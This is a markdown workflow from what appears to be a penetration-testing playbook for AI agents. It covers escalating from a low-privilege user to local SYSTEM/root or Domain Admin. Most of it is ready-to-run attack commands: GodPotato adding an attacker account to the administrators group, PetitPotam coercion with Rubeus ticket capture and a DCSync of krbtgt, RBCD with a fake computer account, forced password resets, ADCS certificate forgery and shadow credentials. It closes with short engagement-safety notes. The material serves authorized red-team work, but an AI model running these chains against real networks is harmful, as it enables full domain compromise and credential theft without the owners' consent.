Workflow: Privilege Escalation
Elevate from user/service context to local SYSTEM/root or from unprivileged domain user to Domain Admin via AD misconfig.
Preconditions
- Shell or WinRM on target (any user), OR
- Low-priv domain credential with BloodHound data in hand
Branch A: Local PrivEsc (Windows)
Automated enumeration (parallelizable)
# Drop and run in separate sessions / sub-agents
.\winPEAS.exe > winpeas.txt
powershell -c ". .\PowerUp.ps1; Invoke-AllChecks" > powerup.txt
.\SharpUp.exe > sharpup.txtManual priority checks
whoami /priv
whoami /groups
systeminfo
sc qc <suspicious-service>
accesschk.exe /accepteula -uwcqv "Authenticated Users" *Common vectors
| Vector | Signal | Exploit |
|---|---|---|
SeImpersonatePrivilege held |
whoami /priv |
GodPotato / PrintSpoofer |
| Unquoted service path w/ writable dir | wmic service get ... |
place C:\Program.exe |
| Weak service ACL | accesschk SERVICE_CHANGE_CONFIG |
sc config to flip binPath |
| AlwaysInstallElevated | reg query ...AlwaysInstallElevated |
malicious MSI |
| Stored creds | cmdkey /list, DPAPI |
runas /savecred, dpapi decrypt |
Token abuse (SeImpersonate present)
# Modern default — works on all current Windows versions
GodPotato.exe -cmd "cmd /c net localgroup administrators attacker /add"
# PrintSpoofer (Win10 / Server 2016-2019 with Spooler service)
PrintSpoofer.exe -i -c cmdBranch B: Local PrivEsc (Linux)
# Automated
./linpeas.sh | tee linpeas.txt
./linux-exploit-suggester.sh | tee les.txt
# Manual priority checks
id; sudo -l
find / -perm -4000 -type f 2>/dev/null # SUID
getcap -r / 2>/dev/null # capabilities
cat /etc/crontab; ls -la /etc/cron.* # scheduled
mount | grep -v 'type proc' # fstab nosuid check
ls -la /etc/passwd /etc/shadow # write accessCommon vectors
| Vector | Signal | Exploit |
|---|---|---|
| sudo NOPASSWD entry | sudo -l |
GTFOBins for the binary |
| SUID root binary | find -perm -4000 |
GTFOBins |
cap_setuid+ep |
getcap -r / |
spawn root shell |
Writable /etc/passwd |
ls -la |
append UID 0 line |
| Writable cron script | inspect files | inject payload |
| Kernel version n-many CVEs | uname -a |
verified exploit only |
Branch C: Domain PrivEsc (low-priv -> DA)
Selection of primitive depends on BloodHound enumeration results. Reason through each candidate before executing.
C1. Kerberoast -> crack -> use service account
Already covered in workflows/credential_attacks.md. If cracked svc account is in a privileged group, skip to dominance.
C2. Unconstrained delegation (non-DC host owned)
# On the owned UD host, monitor for inbound TGTs
Rubeus.exe monitor /interval:5 /nowrap
# Coerce DC$ to authenticate to the UD host
python3 PetitPotam.py <ud_host_ip> <dc_fqdn>
# OR
python3 printerbug.py corp.local/user:pass@dc <ud_host_ip>
# Extract DC$ TGT from Rubeus monitor output, PtT
Rubeus.exe ptt /ticket:<b64_tgt>
# Now DCSync as DC$
secretsdump.py -k -no-pass -just-dc-user krbtgt corp.local/dcC3. RBCD (write on target computer object + MAQ>0)
# Create attacker-controlled computer
addcomputer.py "corp.local/user:pass" -computer-name 'FAKE01$' \
-computer-pass 'Fake01!' -dc-ip $DC_IP
# Grant FAKE01$ the ability to act on behalf of anyone to target
rbcd.py -delegate-from 'FAKE01$' -delegate-to 'TARGET$' \
-action write corp.local/user:pass
# Request TGS for cifs/target as Administrator
getST.py -spn cifs/target.corp.local -impersonate administrator \
-dc-ip $DC_IP 'corp.local/FAKE01$:Fake01!'
# Use the ticket
export KRB5CCNAME=administrator.ccache
psexec.py -k -no-pass corp.local/administrator@target.corp.localC4. ACL abuse (GenericAll/WriteDACL/GenericWrite)
# GenericAll on user -> reset password
net rpc password "target_user" "NewP@ssw0rd!" -U "corp.local/our_user%pass" \
-S dc.corp.local
# GenericWrite on user -> set SPN -> Kerberoast
# (Python) targetedKerberoast or PowerView Set-DomainObject
targetedKerberoast.py -d corp.local -u our_user -p pass --request-user target_userC5. ADCS (ESC1/ESC8) — see references/ad_attack_matrix.md
# ESC1: enroll as DA by specifying altName
certipy-ad req -u our_user@corp.local -p pass -dc-ip $DC_IP \
-target ca.corp.local -ca 'CORP-CA' -template VulnTemplate \
-upn administrator@corp.local
# Authenticate with the cert to get DA TGT
certipy-ad auth -pfx administrator.pfx -dc-ip $DC_IPC6. Shadow Credentials (write msDS-KeyCredentialLink)
certipy-ad shadow auto -u our_user@corp.local -p pass \
-account target_user -dc-ip $DC_IP
# Outputs NT hash of target_user via PKINIT UnPAC-the-hashReasoning budget guidance
- Mechanical enumeration (winpeas/linpeas output parsing): minimal reasoning, pattern-match.
- Vector selection (which GenericAll to use, which RBCD target): extended thinking pays off — you need to trace blast radius, dependencies, and reversibility before committing.
- Exploit sequencing (C2 coercion chain): extended thinking required to map each step's preconditions.
Safety hints
- NEVER run DCSync against a DC without written approval for the specific DC (some customers treat read-only DCs differently).
- Password reset via GenericAll is destructive — the user's current password is overwritten. Coordinate and prefer Shadow Creds where the original password needs to survive.
- RBCD and ACL additions must be reverted before engagement end. Keep an
acl_changes.log. - Avoid skeleton key outside lab — it's a persistence primitive, not a privesc one.
Next workflow
- DA / krbtgt in hand:
workflows/domain_dominance.md